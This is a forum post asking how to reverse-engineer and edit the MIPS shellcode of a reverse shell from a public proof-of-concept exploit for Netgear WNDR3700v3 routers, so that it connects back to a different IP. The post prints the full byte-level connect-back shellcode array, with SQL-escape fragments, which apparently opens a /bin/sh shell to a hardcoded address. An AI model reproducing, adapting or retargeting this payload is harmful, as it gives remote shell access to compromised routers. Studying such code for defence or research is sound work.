I am attempting to edit a reverse shell that was coded by Zach Cutlip for an exploit he wrote for SOHO routers. Here is a link to his source code project.
https://github.com/zcutlip/exploit-poc/tree/master/netgear/wndr3700v3
His reverse shell that is written in Python appears to contain what I believe is machine code for a MIPS-based piece of hardware. The reverse shell specifies a reverse IP. I would like to learn how to reverse his machine code so that I can recreate the shell and have it refer to a different reverse IP.
I looked through the documentation, but everything seemed to point to compiling assembly to make machine code, not the other way around. Can someone please point me in the right direction?
Thanks,
Mike
connect_back=["\xfd\xff\x0f\x24\x27",
"x'20'", #SQL escape
"\xe0\x01\x27\x28\xe0\x01\xff\xff\x06\x28",
"\x57\x10\x02\x24\x0c\x01\x01\x01\xff\xff\xa2\xaf\xff\xff\xa4\x8f",
"\xfd\xff\x0f\x24\x27\x78\xe0\x01\xe2\xff\xaf\xaf\x7a\x69\x0e\x3c",
"\x7a\x69\xce\x35\xe4\xff\xae\xaf\x0a\x0a",
"x'0d'", #SQL escape
"\x3c\x0a\x0a\xad\x35",
"\xe6\xff\xad\xaf\xe2\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01",
"\x4a\x10\x02\x24\x0c\x01\x01\x01\xfd\xff\x0f\x24\x27\x28\xe0\x01",
"\xff\xff\xa4\x8f\xdf\x0f\x02\x24\x0c\x01\x01\x01\xff\xff\xa5",
"x'20'", #SQL escape
"\xff\xff\x01\x24\xfb\xff\xa1\x14\xff\xff\x06\x28\x62\x69\x0f\x3c",
"\x2f\x2f\xef\x35\xf4\xff\xaf\xaf\x73\x68\x0e\x3c\x6e\x2f\xce\x35",
"\xf8\xff\xae\xaf\xfc\xff\xa0\xaf\xf4\xff\xa4\x27\xd8\xff\xa4\xaf",
"\xff\xff\x05\x28\xdc\xff\xa5\xaf\xd8\xff\xa5\x27\xab\x0f\x02\x24",
"\x0c\x01\x01\x01\xff\xff\x06\x28"]
Update: I have converted the machine code into MIPS assembly language using
http://acade.au7.de/disasmips/disasmips.htm
Now I just need to learn how to read MIPS assembly language....